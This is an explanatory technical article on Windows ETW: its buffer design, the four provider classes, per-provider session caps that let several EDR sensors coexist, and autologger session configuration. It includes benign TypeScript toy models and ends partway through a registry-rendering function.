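The first two design moves are easier to see in a toy model. The JavaScript class below is single-threaded bookkeeping only; real ETW buffers are kernel memory and the writer is a kernel thread. Each CPU owns an active buffer and one spare, mirroring the two-buffers-per-processor minimum. A producer touches only its own CPU's slot and never waits for I/O, and the writer's `drain` hands emptied buffers back as spares. In this model, a producer that fills its buffer before the writer has returned the spare drops the event and counts it as lost rather than blocking. `PerCpuTraceBuffers` and its methods are hypothetical names.

```javascript
// Toy, single-threaded model of per-CPU double buffering with an asynchronous
// drain. Real ETW buffers are kernel memory and the writer is a kernel thread.
class PerCpuTraceBuffers {
  constructor(cpuCount, capacity) {
    this.capacity = capacity; // events per buffer
    // Each CPU starts with an active buffer and one spare.
    this.cpus = Array.from({ length: cpuCount }, () => ({ active: [], spare: [] }));
    this.pending = []; // full buffers waiting for the writer
    this.lostEvents = 0;
  }

  // Producer hot path: touches only its own CPU's slot and never waits on I/O.
  write(cpu, event) {
    const slot = this.cpus[cpu];
    if (slot.active.length === this.capacity) {
      if (slot.spare === null) {
        this.lostEvents++; // writer has not returned the spare yet: drop, don't block
        return false;
      }
      this.pending.push({ cpu, events: slot.active });
      slot.active = slot.spare;
      slot.spare = null;
    }
    slot.active.push(event);
    return true;
  }

  // Writer: flush queued buffers (to a file or a real-time consumer) and hand
  // each emptied buffer back to its CPU as the new spare.
  drain() {
    const flushed = [];
    for (const { cpu, events } of this.pending) {
      flushed.push(...events);
      events.length = 0;
      this.cpus[cpu].spare = events;
    }
    this.pending = [];
    return flushed;
  }
}
```

The model flushes only full buffers. A real session also flushes partially filled buffers on a timer, which this sketch leaves out.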

The third move was dynamic enable and disable. Park and Buch describe the resulting capability in one sentence:

ETW gives you the ability to enable and disable logging dynamically, making it easy to perform detailed tracing in production environments without requiring reboots or application restarts. -- Park & Buch, *MSDN Magazine*, April 2007 [@ms-park-buch-2007]

That sentence is the entire reason ETW could later become the EDR substrate. A producer compiles its trace points into shipping code at low cost; a controller flips them on at runtime when somebody actually wants the data. Without that property, you cannot build a security product that ships universal kernel tracing on a billion endpoints.

The fourth move was the trichotomy of providers, controllers, and consumers [@ms-etw-wdk]. Microsoft did not write ETW as an internal-only facility. From the start, third parties could write providers (driver authors instrumenting their own code), controllers (performance tools starting and stopping sessions), and consumers (analyzers reading event streams). The architecture is open by design.

A component that emits ETW events, identified by a GUID. A provider is registered with the system at runtime via the `EventRegister` API (or its predecessor `RegisterTraceGuids` for classic providers) and emits events via `EventWrite` (or `TraceEvent`). Providers ship inside Windows itself, inside Microsoft applications, and inside any third-party binary that wants to expose tracing.

A component that creates, configures, enables, and stops trace sessions. Controllers select which providers a session subscribes to and at which level and keyword bitmask. The Windows Performance Recorder, `logman`, `xperf`, and every EDR's session-management code are controllers.

A component that reads events from a session in real time or from an `.etl` file on disk. Consumers register a callback that the system invokes once per delivered event. The Windows Performance Analyzer, the krabsetw library, SilkETW, and every EDR's sensor process are consumers.

```mermaid
flowchart LR
    Ctl["Controller<br/>StartTrace + EnableTrace"] --> Sess["Trace Session<br/>per-session buffer pool"]
    P1[Provider on CPU 0] --> CPU0[CPU 0 buffer]
    P2[Provider on CPU 1] --> CPU1[CPU 1 buffer]
    P3[Provider on CPU N] --> CPUN[CPU N buffer]
    CPU0 --> WT["Writer thread<br/>asynchronous drain"]
    CPU1 --> WT
    CPUN --> WT
    Sess -.governs.-> CPU0
    Sess -.governs.-> CPU1
    Sess -.governs.-> CPUN
    WT --> File[(".etl file")]
    WT --> RT["Real-time consumer<br/>OpenTrace + ProcessTrace"]
```

The original Windows 2000 implementation supported 32 simultaneous trace sessions [@ms-etw-sessions], a number Microsoft later raised to 64 globally. ETW was framed as a developer-diagnostics facility (the Windows Driver Kit documentation still describes it that way [@ms-etw-wdk]), and the security-telemetry use case did not exist for almost a decade.

But the design choices that made ETW good for low-overhead production diagnostics turn out to be exactly the design choices a security telemetry bus needs. Per-CPU buffers solve the multi-core throughput problem. Asynchronous writes solve the producer-latency problem. Dynamic enable solves the always-shipping-but-mostly-off problem. The trichotomy solves the third-party-extensibility problem. Twenty-five years later, every modern Windows EDR consumes telemetry through the same four primitives.

Windows 2000's 32-session global cap [@ms-etw-sessions] is preserved verbatim on the modern Microsoft Learn page: "Windows 2000: Supports only 32 event tracing sessions." The cap doubled to 64 in later releases and has stayed there ever since.
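To make the first three primitives concrete, here is a minimal single-threaded TypeScript model. It is a sketch under simplifying assumptions: `PerCpuBufferPool`, `emit`, and `drain` are hypothetical names, not ETW internals, and real buffers are fixed-size kernel memory drained by a separate thread. What it keeps is the ownership rule (each producer appends only to its own CPU's buffer, so producers never contend), the writer's merge by timestamp, and dynamic enable as a single cheap branch on the producer path.

```typescript
// Illustrative model of ETW's producer/writer split. Names are hypothetical;
// real ETW buffers live in kernel memory and are drained on another thread.
interface TraceEvent {
  cpu: number;
  timestamp: number;
  payload: string;
}

class PerCpuBufferPool {
  private buffers: TraceEvent[][] = [];
  // Stands in for "some controller has enabled this provider".
  enabled = false;

  constructor(cpuCount: number) {
    for (let i = 0; i < cpuCount; i++) this.buffers.push([]);
  }

  // Producer path: a single branch while disabled, one append while enabled.
  // Each CPU appends only to its own buffer, so producers never share a lock.
  emit(cpu: number, timestamp: number, payload: string): void {
    if (!this.enabled) return;
    this.buffers[cpu].push({ cpu, timestamp, payload });
  }

  // Writer path: empty every per-CPU buffer and merge the events by timestamp,
  // as an asynchronous writer would before handing them to a file or consumer.
  drain(): TraceEvent[] {
    const drained: TraceEvent[] = [];
    for (const buffer of this.buffers) {
      for (const event of buffer) drained.push(event);
    }
    this.buffers = this.buffers.map(() => []);
    return drained.sort((a, b) => a.timestamp - b.timestamp);
  }
}
```

Events emitted before `enabled` flips are simply never recorded, which is the "always-shipping-but-mostly-off" property in miniature.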

The 2000-era design carried one limit, however, that turned out to matter for security: only one trace session could enable a classic provider at a time. The next ten years would be defined by the consequences.

3. The MOF era: one session, one steal, one decade of coexistence pain

In 2005, a third-party performance monitor that had enabled a classic provider in its own trace session could find itself silently cut off the moment another controller (Microsoft's own logman, for instance) started a second session against the same provider GUID. The first session got no error. It just stopped receiving events. That second-session-steals-first behavior is the architectural fact of the entire 2000-2007 era.

Microsoft Learn still documents the rule in one sentence:

Note: "Up to eight trace sessions can enable and receive events from the same manifest-based provider. However, only one trace session can enable a classic provider. If more than one trace session tries to enable a classic provider, the first session would stop receiving events when the second session enables the provider." -- Microsoft Learn, Configuring and Starting an Event Tracing Session [@ms-etw-config]

That single rule made multi-EDR coexistence on classic providers structurally impossible. If Defender's predecessor and a third-party HIPS both wanted real-time process events from the same classic provider, they had to fight for it. The loser got silence with no notification.

The provider class involved was MOF-based, named after the schema language that described its events.

MOF (Managed Object Format): The schema description language inherited from WBEM (Web-Based Enterprise Management). For ETW, MOF files describe each event a classic provider can emit (field names, types, tasks, opcodes) and are compiled into the WMI repository at install time using `mofcomp`. Consumers decode events by querying the WMI repository for the matching MOF schema.

Classic provider: A synonym for *MOF provider*. The original ETW provider class introduced in Windows 2000. Registered with `RegisterTraceGuids`, emits events via `TraceEvent`, decoded against a MOF schema in the WMI repository. Capped at one trace session per provider.

The MOF model was workable for a single-consumer world. A performance-tuning team running an in-house tool could enable the provider, capture, and disable. As the substrate of a security stack with multiple agents on the same host, it could not work. The mid-2000s had not yet produced a "multiple agents on the same host" world, so the limit did not bite immediately. By 2007 it would.

Class	Era	Schema location	Sessions/provider	Adoption in 2026
MOF / classic	2000	WMI repository	1	Niche; mostly NT Kernel Logger
WPP	~2002	`.pdb` (TMF)	1	Pervasive inside Windows internals
Manifest-based	2007 (Vista)	XML manifest	8	Dominant for security telemetry
TraceLogging	2015 (Win10)	Inline (TLV)	8	Rising for new app/service code

A handful of classic providers survived the 2007 transition and are still significant. The most important is the NT Kernel Logger [@ms-etw-sessions], the special-purpose system session that captures high-throughput kernel events: file I/O, disk I/O, registry operations, network packets. On most consumer SKUs it remains the only path to those event streams at line rate. Sysmon and most kernel-level diagnostics tools use the NT Kernel Logger or its modern descendants.

The NT Kernel Logger is a system reserved logger. There is exactly one of it on a host, and the kernel itself owns the buffers. Tools that want kernel disk, file, registry, or network events at high throughput typically subscribe through it rather than through manifest providers. This is why a host can have eight Microsoft-Windows-Kernel-File consumers but cannot easily have two simultaneous full-fidelity disk I/O traces.

By 2007 Microsoft knew the one-session limit had to go. The fix shipped with Windows Vista in January 2007, and it was the central architectural decision of the entire ETW-as-EDR-substrate story.

4. Vista's eight sessions: the architectural decision that made the modern EDR endpoint possible

Park and Buch open their April 2007 MSDN Magazine article with the line that frames every later development:

On Windows Vista, ETW has gone through a major upgrade, and one of the most significant changes is the introduction of the unified event provider model and APIs. -- Park & Buch, *MSDN Magazine*, April 2007 [@ms-park-buch-2007]

The new model raised the per-provider session cap from one to eight. That single number is why Defender, CrowdStrike Falcon, SentinelOne, Sysmon, and a researcher's SilkETW tap can all read Microsoft-Windows-Kernel-Process [@fireeye-silketw-launch] from the same host today without one of them stealing events from the others.

The Vista model also unified two things that had been separate. ETW providers wrote to per-CPU ring buffers; the Win32 Event Log was a different facility with its own writer, its own format, and its own consumers. Park and Buch describe the unification verbatim:

The new unified APIs combine logging traces and writing to the Event Viewer into one consistent, easy-to-use mechanism for event providers. -- Park & Buch, *MSDN Magazine*, April 2007 [@ms-park-buch-2007]

After Vista, a single EventWrite call from a manifest-based provider lands both in the per-CPU ring buffer for ETW consumers and in the evtx channel for wevtutil and Group Policy audit consumers, depending on how the manifest's channel mappings are configured. The "Event Viewer" the user sees is now a consumer of ETW.

Manifest-based provider: The Vista-era ETW provider class. The provider author writes an XML manifest enumerating events, fields, tasks, opcodes, levels, keywords, and channels. The `mc.exe` message compiler turns the manifest into a binary resource embedded in the provider binary; `wevtutil im` registers the manifest with the system at install time. At runtime the provider calls `EventRegister` once per provider GUID and `EventWrite` per event. Capped at eight trace sessions per provider.

Channel: A logical destination for an event, declared in a manifest. The four standard channel types are *Admin* (operational events for administrators), *Operational* (verbose events for operators), *Analytic* (high-volume events for diagnostics), and *Debug* (developer-only events). When the provider's `EventWrite` fires, the kernel demultiplexes by channel: events with channels enabled in the `evtx` configuration land in the corresponding channel log, while subscribed real-time consumers receive them through their session.

The deployment pipeline for a manifest-based provider is heavier than for a classic provider. The author writes a manifest, compiles it, embeds the resource, and runs wevtutil im at install time. Microsoft Learn explicitly calls out the distinction between provider registration and manifest installation [@ms-eventregister], and notes that each process can register up to 1,024 providers. In practice few processes come close.

Figure: Manifest-based provider pipeline. At build and install time, the author writes manifest.xml, mc.exe compiles it to a binary resource, the resource is embedded in the provider .dll/.exe, and the installer runs wevtutil im manifest.xml to add it to the system-wide manifest registry. At runtime, the provider process calls EventRegister with its GUID and then EventWrite per event. Each event flows both to the per-CPU ring buffers for ETW sessions, which feed real-time consumers, and to the channel demultiplexer (Admin / Operational / Analytic / Debug), which feeds the .evtx log files. Both paths decode against the system-wide manifest registry.

The cap rules now read like this: eight trace sessions can enable a manifest-based provider concurrently [@ms-about-etw]; up to 64 sessions can run on the system at once [@ms-etw-sessions]; EnableTraceEx2 returns ERROR_NO_SYSTEM_RESOURCES when the per-provider cap binds [@ms-enabletraceex2]. The number eight was fixed in 2007, years before anyone planned to run several security agents side by side on one host, yet it is now the load-bearing number in modern Windows endpoint security.
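The difference between the two regimes is easiest to see side by side. The following is a toy TypeScript model, not an ETW API: `ProviderRegistry`, `register`, `enable`, and `receivers` are hypothetical names. Only the two rules (a classic provider's second enable silently displaces the first session; a manifest or TraceLogging provider accepts eight sessions and then fails) and the Win32 value of ERROR_NO_SYSTEM_RESOURCES (1450) come from the documentation. The handling of a session that re-enables a provider it already holds is a modeling assumption, marked as such in the code.

```typescript
// Toy model of per-provider session caps at enable time. Not an ETW API.
const ERROR_SUCCESS = 0;
const ERROR_NO_SYSTEM_RESOURCES = 1450; // Win32 error code
const MAX_SESSIONS_PER_PROVIDER = 8; // manifest-based and TraceLogging providers

type ProviderKind = "classic" | "manifest" | "tracelogging";

class ProviderRegistry {
  private kinds = new Map<string, ProviderKind>();
  private sessions = new Map<string, string[]>(); // provider GUID -> enabled sessions

  register(providerGuid: string, kind: ProviderKind): void {
    this.kinds.set(providerGuid, kind);
    this.sessions.set(providerGuid, []);
  }

  enable(providerGuid: string, sessionName: string): number {
    const kind = this.kinds.get(providerGuid);
    if (kind === undefined) throw new Error(`unknown provider ${providerGuid}`);
    const current = this.sessions.get(providerGuid) ?? [];
    if (kind === "classic") {
      // One session per classic provider: the newcomer takes over and the
      // previous session silently stops receiving events. No error is raised.
      this.sessions.set(providerGuid, [sessionName]);
      return ERROR_SUCCESS;
    }
    // Modeling assumption: re-enabling from a session that already holds a
    // slot updates that subscription rather than consuming a new slot.
    if (current.indexOf(sessionName) >= 0) return ERROR_SUCCESS;
    if (current.length >= MAX_SESSIONS_PER_PROVIDER) return ERROR_NO_SYSTEM_RESOURCES;
    this.sessions.set(providerGuid, current.concat(sessionName));
    return ERROR_SUCCESS;
  }

  receivers(providerGuid: string): string[] {
    return this.sessions.get(providerGuid) ?? [];
  }
}
```

Note the asymmetry the model makes visible: the classic path never reports failure, which is exactly why the loser in the MOF era "got silence with no notification", while the manifest path fails loudly with an error code a sensor can log.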

Key idea: The eight-session cap on manifest-based providers is the single architectural decision that made multi-EDR coexistence on the same Windows host possible. Without it, the second EDR to subscribe to Microsoft-Windows-Kernel-Process would silently steal events from the first.

Consider the manifest for Microsoft-Windows-Kernel-Process, GUID {22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}. It declares ProcessStart (event ID 1), ProcessStop (event ID 2), ImageLoad (event ID 5), and so on. Defender's MsMpEng.exe can subscribe; so can CrowdStrike Falcon, Sysmon, and a SilkETW researcher's tap. None starves another. The Vista unification is the architectural enabler of the modern multi-EDR Windows endpoint.

With multi-consumer concurrency solved, the next problems were authoring overhead and producer integrity. Two parallel paths branched off the Vista manifest model: TraceLogging for the first, the EtwTi PPL/ELAM gate for the second.

5. Two more provider classes: WPP for the kernel tree, TraceLogging for the app tier

Vista's manifest-based providers solved coexistence and decoding, but they were heavy to deploy. Microsoft shipped two more provider classes -- one older than Vista and one younger -- that traded manifest deployment for two different kinds of simplicity.

WPP: the C-preprocessor approach

WPP -- Windows software trace PreProcessor -- predates Vista. Community references and the Park & Buch description of ETW being "abstracted into the Windows preprocessor (WPP) software tracing technology" [@ms-park-buch-2007] place its first WDK ship in the Windows XP era; no Microsoft primary source pins a specific build. It became the standard tracing facility inside the Windows kernel tree itself for years. The WDK page [@ms-wpp] frames its purpose:

"WPP software tracing supplements and enhances WMI event tracing by adding ways to simplify tracing the operation of the trace provider. It is an efficient mechanism for the trace provider to log real-time binary messages."

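A WPP provider is authored in C with macros that look like printf calls. At build time the WPP preprocessor (tracewpp) scans the source and generates a trace message header (.tmh) for each file; the macros defined there expand DoTraceMessage(FlagId, "Frobnicating widget %d", widgetId) into a trace-message call (TraceMessage in user mode, WmiTraceMessage in kernel mode) against the control GUID the author declares with WPP_CONTROL_GUIDS. The format strings never travel in the event stream: they are extracted at build time into Trace Message Format (TMF) information stored in the binary's .pdb. The producer cost is the smallest of any ETW provider class: emitting an event is a function call plus a few stores into a buffer. There is no manifest to deploy, no XML to author.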

The corresponding decode cost is the highest. A WPP event arrives at the consumer as a binary payload referencing a TMF identifier. To turn that into a human-readable message the consumer needs the producer's .pdb file. If you do not have the symbols for the binary that emitted the event, you do not know what the event means.
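The decode dependency can be modeled in a few lines. In this TypeScript sketch a WPP event is reduced to a message identifier plus arguments, and a `Map` stands in for the format strings a consumer would recover from the producer's PDB. `WppEvent`, `FormatTable`, `decodeWpp`, the string `messageId`, and the `%d`/`%s`-only substitution are all illustrative simplifications, not the real TMF format or any real decoder's API.

```typescript
// Toy model of WPP decoding. Field names and format handling are illustrative.
interface WppEvent {
  messageId: string; // stands in for the message identifier a real WPP event carries
  args: Array<string | number>;
}

// Stands in for the format strings recovered from the producer's .pdb.
type FormatTable = Map<string, string>;

function decodeWpp(event: WppEvent, tmf: FormatTable | undefined): string {
  const format = tmf?.get(event.messageId);
  if (format === undefined) {
    // Without the producer's symbols, all a consumer can show is opaque data.
    return `<undecodable WPP event ${event.messageId}: ${event.args.length} args>`;
  }
  // Substitute arguments into %d / %s placeholders, left to right.
  let next = 0;
  return format.replace(/%[ds]/g, () => String(event.args[next++]));
}
```

The same event yields a readable line or an opaque placeholder depending solely on whether the consumer holds the producer's format table, which is the whole reason WPP never left the Windows source tree.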

That decode cost is why WPP did not become the EDR substrate. Sealighter's README puts the operational consequence verbatim:

"WPP traces compounds the issues, providing almost no easy-to-find data about provider and their events." -- Sealighter README [@gh-sealighter]

WPP (Windows software trace PreProcessor): A C-preprocessor-based ETW authoring path inherited from the XP-era WDK. Format strings are extracted to a TMF resource that lives in the producer's `.pdb`. Producer cost is minimal; decode cost requires the producer's symbol files. WPP providers inherit the classic one-session-per-provider cap and are pervasively used inside Windows itself for in-tree dev-time tracing.

WPP providers also inherit the classic one-session-per-provider cap [@ms-about-etw], which would have made them unworkable for multi-EDR consumption even if the decode problem were solved. So WPP became the kernel-tree internal tracing facility: ubiquitous inside Microsoft's source tree, irrelevant outside it.

TraceLogging: schema in the payload

Eight years after Vista, in Windows 10 (2015), Microsoft shipped a parallel path that solved a different problem. TraceLogging [@ms-tracelogging-about] keeps the eight-session cap of manifest providers but eliminates the manifest deployment burden:

"TraceLogging is a system for logging events that can be decoded without a manifest." -- Microsoft Learn, About TraceLogging [@ms-tracelogging-about]

A TraceLogging event carries its own schema inline. Alongside the field values, each event ships a compact metadata block that lists every field's name and a one-byte type tag; variable-length values such as counted strings carry their own length. A consumer that has never seen the provider before can still decode the event because the names and types of every field travel with it. The provider author needs no XML manifest, no mc.exe, no wevtutil im.
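The property that matters, a consumer decoding a provider it has never seen, can be demonstrated with a deliberately simplified encoding. The wire format in this TypeScript sketch is invented for illustration and is NOT the real TraceLogging layout: each field is a type tag byte, a name-length byte, the ASCII name, then the value (a little-endian uint32, or a uint16 length followed by ASCII text). `encodeEvent`, `decodeEvent`, and the tag values are hypothetical. What it shares with TraceLogging is that names and types travel with the event, so the decoder needs no out-of-band schema.

```typescript
// Toy self-describing event format, invented for illustration only.
const TYPE_UINT32 = 1;
const TYPE_STRING = 2;

type FieldValue = number | string;

function asciiBytes(text: string): number[] {
  const out: number[] = [];
  for (let i = 0; i < text.length; i++) out.push(text.charCodeAt(i) & 0x7f);
  return out;
}

function encodeEvent(fields: Array<[string, FieldValue]>): Uint8Array {
  const bytes: number[] = [];
  for (const [name, value] of fields) {
    const nameBytes = asciiBytes(name);
    if (nameBytes.length > 255) throw new Error("field name too long");
    if (typeof value === "number") {
      bytes.push(TYPE_UINT32, nameBytes.length, ...nameBytes);
      bytes.push(value & 0xff, (value >>> 8) & 0xff, (value >>> 16) & 0xff, (value >>> 24) & 0xff);
    } else {
      const valueBytes = asciiBytes(value);
      bytes.push(TYPE_STRING, nameBytes.length, ...nameBytes);
      bytes.push(valueBytes.length & 0xff, (valueBytes.length >>> 8) & 0xff, ...valueBytes);
    }
  }
  return new Uint8Array(bytes);
}

// The decoder knows only the two type tags, never the provider's field list.
function decodeEvent(buf: Uint8Array): Record<string, FieldValue> {
  const result: Record<string, FieldValue> = {};
  let pos = 0;
  const readAscii = (len: number): string => {
    let s = "";
    for (let i = 0; i < len; i++) s += String.fromCharCode(buf[pos + i]);
    pos += len;
    return s;
  };
  while (pos < buf.length) {
    const type = buf[pos++];
    const name = readAscii(buf[pos++]);
    if (type === TYPE_UINT32) {
      result[name] = (buf[pos] | (buf[pos + 1] << 8) | (buf[pos + 2] << 16) | (buf[pos + 3] << 24)) >>> 0;
      pos += 4;
    } else if (type === TYPE_STRING) {
      const len = buf[pos] | (buf[pos + 1] << 8);
      pos += 2;
      result[name] = readAscii(len);
    } else {
      throw new Error(`unknown type tag ${type}`);
    }
  }
  return result;
}
```

The cost the next paragraph describes is visible here too: every event repeats "ProcessID" and "ImageName" as bytes, where a manifest-based event would carry only the values.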

The trade-off is per-event size. Inline schema strings cost bytes per event. For a high-volume provider emitting millions of events per minute, the per-event size matters and a manifest-based provider is correct. For a new component author who wants tracing without an install-time deployment dance, TraceLogging is the right answer.

TraceLogging: A self-describing ETW provider class shipped in Windows 10. Each event carries its field names and type tags alongside the values, so consumers decode without a manifest. Available from C/C++ via `TraceLoggingProvider.h`, from .NET via `EventSource` with `EtwSelfDescribingEventFormat`, and from WinRT via `LoggingChannel`. Inherits the eight-session cap from the manifest-based class.

TraceLogging is also the unified path across runtimes. The same self-describing payload format is emitted from native C/C++, from .NET (when an EventSource opts into EtwSelfDescribingEventFormat), and from kernel-mode drivers [@ms-tracelogging-portal]. A consumer using TDH (the Trace Data Helper API) decodes them without distinguishing between the runtime that emitted them.

Four classes, four trade-offs

Class	First Shipped	Schema Location	Sessions/Provider	Decode without symbols/manifest?	Best for
MOF / classic	2000	WMI repository (`mofcomp`)	1	No -- needs MOF schema	Legacy components; NT Kernel Logger
WPP	~2002	`.pdb` (TMF)	1	No -- needs producer PDB	In-tree Windows kernel dev-time tracing
Manifest-based	2007 (Vista)	XML manifest, system-installed	8	No -- needs installed manifest	Shipping security telemetry
TraceLogging	2015 (Win10)	Inline TLV in payload	8	Yes	New apps and services; cross-runtime

Sources for the table: [@ms-about-etw, @ms-etw-config, @ms-tracelogging-about, @ms-wpp].

For new shipping Windows components with a known event vocabulary and high volume, choose manifest-based: smallest per-event size, evtx integration, eight-consumer concurrency. For new cross-runtime open-source providers where deployment friction matters, choose TraceLogging: same eight-consumer concurrency, no XML to author, decodable everywhere. For in-source-tree dev-time tracing inside a binary you already have symbols for, WPP is fine. For new security-relevant providers, never choose classic: the one-session cap is structurally incompatible with multi-EDR coexistence.
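The guidance above is compact enough to encode as a decision function, which makes the precedence between the rules explicit. This TypeScript sketch is one reading of the paragraph, not an official rule: `ProviderNeeds`, its flags, and `chooseProviderClass` are hypothetical, and falling back to TraceLogging when no other rule applies is an assumption.

```typescript
// One reading of the provider-class guidance above. All names are hypothetical.
type ProviderClassChoice = "wpp" | "manifest" | "tracelogging";

interface ProviderNeeds {
  securityRelevant: boolean;          // will EDRs or other third parties subscribe?
  inTreeDevTracingOnly: boolean;      // read only by developers who hold the PDBs
  highVolumeKnownVocabulary: boolean; // stable event set, millions of events
}

function chooseProviderClass(needs: ProviderNeeds): ProviderClassChoice {
  // "classic" is deliberately not a possible answer: its one-session cap is
  // structurally incompatible with multi-EDR coexistence.
  if (needs.inTreeDevTracingOnly && !needs.securityRelevant) return "wpp";
  // Smallest per-event size, evtx integration, eight concurrent sessions.
  if (needs.highVolumeKnownVocabulary) return "manifest";
  // Assumed default: cross-runtime or friction-sensitive providers, and anything
  // else, get TraceLogging (same eight-session cap, no manifest to deploy).
  return "tracelogging";
}
```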

Four provider classes, four trade-offs. But every one of them shares a structural weakness: the producer fires from inside the calling process, and any code in that process can patch the runtime entry-point and silence the provider for itself. That is the weakness Adam Chester made famous in 2020, and the one EtwTi was built to defeat.

6. Sessions, buffers, and the autologger registry: where the telemetry actually lives

Open regedit on a Windows host and navigate to HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger. You are looking at the persistence surface of every trace session that survives a reboot on this machine -- and the persistence surface every modern EDR uses to install itself.

A session is the unit ETW actually exposes to controllers. It owns a per-session pool of buffers, a writer thread, a destination (file or real-time consumer), and a list of providers it has subscribed to. The lifecycle is short. A controller fills out an EVENT_TRACE_PROPERTIES structure [@ms-event-trace-props] with a session name, buffer size, logging mode, and destination, then calls StartTrace. The kernel allocates the buffers (at least two per logical processor [@ms-event-trace-props]) and returns a session handle. The controller then calls EnableTraceEx2 [@ms-enabletraceex2] for each provider it wants to subscribe to, passing EVENT_CONTROL_CODE_ENABLE_PROVIDER along with the provider GUID, level, and keyword bitmask.
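The level and keyword bitmask passed to EnableTraceEx2 decide which events a provider actually writes into the session. Below is a TypeScript sketch of the rule as the EnableTraceEx2 documentation describes it for the common case: an event passes if its level is at or below the session's level, and either it carries no keyword bits or its keywords intersect MatchAnyKeyword and contain every bit of MatchAllKeyword. It is a model, not a reimplementation: providers can refine filtering themselves, special cases such as a session level of 0 are left out, and `SessionFilter`, `EventDescriptor`, and `isEventEnabled` are hypothetical names. Keywords use `bigint` because ETW keywords are 64-bit.

```typescript
// Simplified model of ETW level/keyword filtering; names are hypothetical.
interface SessionFilter {
  level: number;           // maximum event level, e.g. 4 = Information
  matchAnyKeyword: bigint; // event must share at least one of these bits
  matchAllKeyword: bigint; // event must carry all of these bits
}

interface EventDescriptor {
  level: number;
  keyword: bigint;
}

function isEventEnabled(ev: EventDescriptor, s: SessionFilter): boolean {
  if (ev.level > s.level) return false;
  // Events with no keyword bits set are not subject to keyword filtering.
  if (ev.keyword === 0n) return true;
  return (ev.keyword & s.matchAnyKeyword) !== 0n &&
    (ev.keyword & s.matchAllKeyword) === s.matchAllKeyword;
}
```

Setting MatchAnyKeyword to all ones, as many sensors do, turns keyword filtering into "everything the level allows", which is cheap to configure and expensive to consume.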

If the provider's per-class session cap is already saturated, EnableTraceEx2 returns ERROR_NO_SYSTEM_RESOURCES. If the caller lacks the privilege to enable that provider, it returns ERROR_ACCESS_DENIED. We will see both error codes again later, on different paths.

The sweet spot for buffer size is small. The Microsoft Learn primary source states it explicitly: "Trace sessions with large buffers (256KB or larger) should be used only for diagnostic investigations or testing, not for production tracing." [@ms-event-trace-props] Production session buffer sizes typically sit in the 32-64KB range.
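A controller can check its session settings against the two documented rules above (at least two buffers per logical processor; 256 KB buffers reserved for diagnostics) before calling StartTrace. This TypeScript sketch reports problems rather than enforcing anything; `SessionConfig` and `validateSessionConfig` are hypothetical, and the only assumption carried over from EVENT_TRACE_PROPERTIES is that BufferSize is expressed in kilobytes.

```typescript
// Hypothetical pre-flight check for session buffer settings.
interface SessionConfig {
  bufferSizeKb: number; // EVENT_TRACE_PROPERTIES.BufferSize is in kilobytes
  minimumBuffers: number;
  maximumBuffers: number;
}

function validateSessionConfig(cfg: SessionConfig, logicalProcessors: number): string[] {
  const problems: string[] = [];
  const floor = 2 * logicalProcessors; // at least two buffers per logical processor
  if (cfg.minimumBuffers < floor) {
    problems.push(`minimumBuffers ${cfg.minimumBuffers} is below ${floor} (two per logical processor)`);
  }
  if (cfg.maximumBuffers < cfg.minimumBuffers) {
    problems.push("maximumBuffers is smaller than minimumBuffers");
  }
  if (cfg.bufferSizeKb >= 256) {
    problems.push(`bufferSizeKb ${cfg.bufferSizeKb} is meant for diagnostics, not production tracing`);
  }
  return problems;
}
```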

There are three logging modes. File mode writes events to a sequential .etl file on disk; the writer thread drains buffers to disk and the file grows. Circular mode writes to a fixed-size file in a circular buffer; old events are overwritten when the file fills. Real-time mode delivers events to a real-time consumer process through a callback the consumer registers. Defender, EDR sensors, and Sysmon all use real-time mode for their hot paths; they may also write to file as a forensic backup.

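Real-time consumer: A process that opens a session started with `EVENT_TRACE_REAL_TIME_MODE` in its `LogFileMode`, by calling `OpenTrace` with the `ProcessTraceMode` field of `EVENT_TRACE_LOGFILE` set to `PROCESS_TRACE_MODE_REAL_TIME`, and receives events live via a registered callback rather than from an `.etl` file on disk. Real-time consumers must keep up with the producer rate or events are lost.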

The autologger registry path is what makes a session survive a reboot. A subkey under HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\<SessionName> defines a session that the kernel starts at boot, before most user-mode services are running. Each subkey's values configure the session: BufferSize, MaximumBuffers, LogFileMode, FileName, plus a nested <SessionName>\<ProviderGuid> subkey for each provider to enable.
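To see the layout this paragraph describes as concrete registry data, here is a TypeScript sketch that renders an autologger definition as `.reg` text for review. The session name ExampleEdrSensor, the file path, and every value chosen are hypothetical. The value names (Start, BufferSize, MaximumBuffers, LogFileMode, FileName, and Enabled, EnableLevel, MatchAnyKeyword on the provider subkey) follow Microsoft's AutoLogger documentation as we understand it and should be checked against that page before anything like this touches a real host. The encoding rules (`dword:` as eight hex digits, `hex(b):` as eight little-endian bytes for a QWORD, escaped backslashes in strings) are standard `.reg` syntax.

```typescript
// Sketch: render a hypothetical autologger definition as .reg text for review.
const AUTOLOGGER_ROOT =
  "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger";

interface AutologgerProvider {
  guid: string;            // braced provider GUID, used as the subkey name
  level: number;           // EnableLevel
  matchAnyKeyword: bigint; // 64-bit keyword mask, stored as a QWORD
}

interface AutologgerSession {
  name: string;
  bufferSizeKb: number;
  maximumBuffers: number;
  logFileMode: number;     // e.g. 0x100 = EVENT_TRACE_REAL_TIME_MODE
  fileName?: string;
  providers: AutologgerProvider[];
}

// REG_DWORD in .reg syntax: eight lowercase hex digits.
function dword(n: number): string {
  return "dword:" + ("00000000" + (n >>> 0).toString(16)).slice(-8);
}

// REG_QWORD in .reg syntax: hex(b) followed by eight little-endian bytes.
function qword(value: bigint): string {
  const bytes: string[] = [];
  let v = value;
  for (let i = 0; i < 8; i++) {
    bytes.push(("0" + Number(v & 0xffn).toString(16)).slice(-2));
    v >>= 8n;
  }
  return "hex(b):" + bytes.join(",");
}

// REG_SZ in .reg syntax: backslashes and double quotes are escaped.
function regString(s: string): string {
  return '"' + s.replace(/\\/g, "\\\\").replace(/"/g, '\\"') + '"';
}

function renderAutologgerReg(s: AutologgerSession): string {
  const key = `${AUTOLOGGER_ROOT}\\${s.name}`;
  const lines = [
    "Windows Registry Editor Version 5.00",
    "",
    `[${key}]`,
    `"Start"=${dword(1)}`, // 1 = start this session at boot
    `"BufferSize"=${dword(s.bufferSizeKb)}`,
    `"MaximumBuffers"=${dword(s.maximumBuffers)}`,
    `"LogFileMode"=${dword(s.logFileMode)}`,
  ];
  if (s.fileName !== undefined) lines.push(`"FileName"=${regString(s.fileName)}`);
  for (const p of s.providers) {
    lines.push(
      "",
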